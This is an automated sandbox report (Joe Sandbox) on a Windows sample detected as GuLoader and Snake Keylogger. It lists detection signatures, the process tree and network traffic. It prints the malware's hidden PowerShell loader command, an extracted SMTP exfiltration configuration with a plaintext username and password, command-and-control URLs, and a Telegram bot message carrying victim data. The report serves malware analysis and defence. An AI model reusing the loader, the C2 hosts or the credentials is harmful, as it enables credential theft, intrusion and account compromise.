Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Snvlerier.exe

Overview

General Information

Sample name:Snvlerier.exe
Analysis ID:1532989
MD5:9970463edf086976996f0bc196fcfc60
SHA1:22f3132f1456dba3bcc7096d2c10c5635ee08828
SHA256:6e0230eac8eeadd5214b6d83cc2f470933bee1c4261a607e182a093af14b62cb
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Snvlerier.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\Snvlerier.exe" MD5: 9970463EDF086976996F0BC196FCFC60)
    • powershell.exe (PID: 7300 cmdline: "powershell.exe" -windowstyle hidden "$Dictyoceratine=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Eftermles.Tra';$Ciceronian=$Dictyoceratine.SubString(53398,3);.$Ciceronian($Dictyoceratine)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7824 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "transjcama@comercialkmag.com", "Password": "pW@4G()=#2", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.3066949084.0000000021501000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000006.00000002.3066949084.0000000021608000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000002.2199226437.00000000093E6000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: msiexec.exe PID: 7824JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: msiexec.exe PID: 7824JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle hidden "$Dictyoceratine=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Eftermles.Tra';$Ciceronian=$Dictyoceratine.SubString(53398,3);.$Ciceronian($Dictyoceratine)", CommandLine: "powershell.exe" -windowstyle hidden "$Dictyoceratine=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Eftermles.Tra';$Ciceronian=$Dictyoceratine.SubString(53398,3);.$Ciceronian($Dictyoceratine)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Snvlerier.exe", ParentImage: C:\Users\user\Desktop\Snvlerier.exe, ParentProcessId: 7272, ParentProcessName: Snvlerier.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Dictyoceratine=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Eftermles.Tra';$Ciceronian=$Dictyoceratine.SubString(53398,3);.$Ciceronian($Dictyoceratine)", ProcessId: 7300, ProcessName: powershell.exe
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.185.110, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7824, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 213.165.67.118, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7824, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49873
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Dictyoceratine=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Eftermles.Tra';$Ciceronian=$Dictyoceratine.SubString(53398,3);.$Ciceronian($Dictyoceratine)", CommandLine: "powershell.exe" -windowstyle hidden "$Dictyoceratine=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Eftermles.Tra';$Ciceronian=$Dictyoceratine.SubString(53398,3);.$Ciceronian($Dictyoceratine)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Snvlerier.exe", ParentImage: C:\Users\user\Desktop\Snvlerier.exe, ParentProcessId: 7272, ParentProcessName: Snvlerier.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Dictyoceratine=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Eftermles.Tra';$Ciceronian=$Dictyoceratine.SubString(53398,3);.$Ciceronian($Dictyoceratine)", ProcessId: 7300, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-14T09:12:13.508895+020028033053Unknown Traffic192.168.2.449756188.114.96.3443TCP
            2024-10-14T09:12:14.647364+020028033053Unknown Traffic192.168.2.449768188.114.96.3443TCP
            2024-10-14T09:12:16.929136+020028033053Unknown Traffic192.168.2.449783188.114.96.3443TCP
            2024-10-14T09:12:19.118410+020028033053Unknown Traffic192.168.2.449802188.114.96.3443TCP
            2024-10-14T09:12:21.359711+020028033053Unknown Traffic192.168.2.449821188.114.96.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-14T09:12:11.601627+020028032742Potentially Bad Traffic192.168.2.449744193.122.130.080TCP
            2024-10-14T09:12:12.929762+020028032742Potentially Bad Traffic192.168.2.449744193.122.130.080TCP
            2024-10-14T09:12:14.070380+020028032742Potentially Bad Traffic192.168.2.449762193.122.130.080TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000006.00000002.3066949084.0000000021501000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "transjcama@comercialkmag.com", "Password": "pW@4G()=#2", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
            Source: http://varders.kozow.com:8081Virustotal: Detection: 14%Perma Link
            Source: http://aborters.duckdns.org:8081Virustotal: Detection: 13%Perma Link
            Source: http://anotherarmy.dns.army:8081Virustotal: Detection: 17%Perma Link
            Source: http://51.38.247.67:8081/_send_.php?LVirustotal: Detection: 7%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Snvlerier.exeVirustotal: Detection: 27%Perma Link
            Source: Snvlerier.exeVirustotal: Detection: 27%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Snvlerier.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49750 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49827 version: TLS 1.2
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb;C source: powershell.exe, 00000001.00000002.2198489174.0000000008024000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bqm.Core.pdbE.b source: powershell.exe, 00000001.00000002.2197939088.0000000007F41000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2184444852.00000000006E0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2197939088.0000000007F41000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbam" source: powershell.exe, 00000001.00000002.2198489174.0000000008024000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: stem.Core.pdbobOoC source: powershell.exe, 00000001.00000002.2197939088.0000000007F41000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2197939088.0000000007F41000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Snvlerier.exeCode function: 0_2_00405FF1 FindFirstFileA,FindClose,0_2_00405FF1
            Source: C:\Users\user\Desktop\Snvlerier.exeCode function: 0_2_0040264F FindFirstFileA,0_2_0040264F
            Source: C:\Users\user\Desktop\Snvlerier.exeCode function: 0_2_004055CA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055CA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02ACF45Dh6_2_02ACF2C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02ACF45Dh6_2_02ACF4AC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02ACFC19h6_2_02ACF961
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23AACF49h6_2_23AACCA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23AAF661h6_2_23AAF3B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23AA0D0Dh6_2_23AA0B30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23AA1697h6_2_23AA0B30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23AAEDB1h6_2_23AAEB08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23AAF209h6_2_23AAEF60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23AAE959h6_2_23AAE6B0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23AAE0A9h6_2_23AADE00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_23AA0673
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23AAE501h6_2_23AAE258
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23AADC51h6_2_23AAD9A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23AA31E0h6_2_23AA2DBB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23AA31E0h6_2_23AA2DC8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23AA31E0h6_2_23AA310E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23AA2C19h6_2_23AA2968
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23AAD7F9h6_2_23AAD550
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23AAD3A1h6_2_23AAD0F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23AAFAB9h6_2_23AAF810
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_23AA0040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_23AA0853

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficTCP traffic: 192.168.2.4:49873 -> 213.165.67.118:587
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2014/10/2024%20/%2014:08:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49762 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49744 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49756 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49783 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49768 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49821 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49802 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.4:49873 -> 213.165.67.118:587
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49750 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1o_nnklIpduc3m7_4gtk6vGG-tgHcGRhM HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1o_nnklIpduc3m7_4gtk6vGG-tgHcGRhM&export=download HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2014/10/2024%20/%2014:08:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficDNS traffic detected: DNS query: smtp.ionos.es
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 14 Oct 2024 07:12:22 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: msiexec.exe, 00000006.00000002.3066949084.0000000021608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: msiexec.exe, 00000006.00000002.3066949084.0000000021501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: msiexec.exe, 00000006.00000002.3066949084.0000000021501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: msiexec.exe, 00000006.00000002.3066757142.000000002144B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.0000000021693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.geotrust.com/GeoTrustTLSRSACAG1.crt0
            Source: msiexec.exe, 00000006.00000002.3066757142.000000002144B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.0000000021693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdp.geotrust.com/GeoTrustTLSRSACAG1.crl0v
            Source: msiexec.exe, 00000006.00000002.3066949084.0000000021501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: msiexec.exe, 00000006.00000002.3066949084.0000000021501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: powershell.exe, 00000001.00000002.2191636032.0000000006D66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: msiexec.exe, 00000006.00000002.3066757142.000000002144B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.0000000021693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
            Source: Snvlerier.exe, Snvlerier.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Snvlerier.exe, Snvlerier.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.2188765329.00000000056FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: msiexec.exe, 00000006.00000002.3066757142.000000002144B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.0000000021693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0B
            Source: powershell.exe, 00000001.00000002.2185474928.00000000047E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.2185474928.0000000004691000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.0000000021501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: msiexec.exe, 00000006.00000002.3066949084.0000000021608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.ionos.es
            Source: msiexec.exe, 00000006.00000002.3066757142.000000002144B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.0000000021693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://status.geotrust.com0
            Source: msiexec.exe, 00000006.00000002.3066949084.0000000021501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
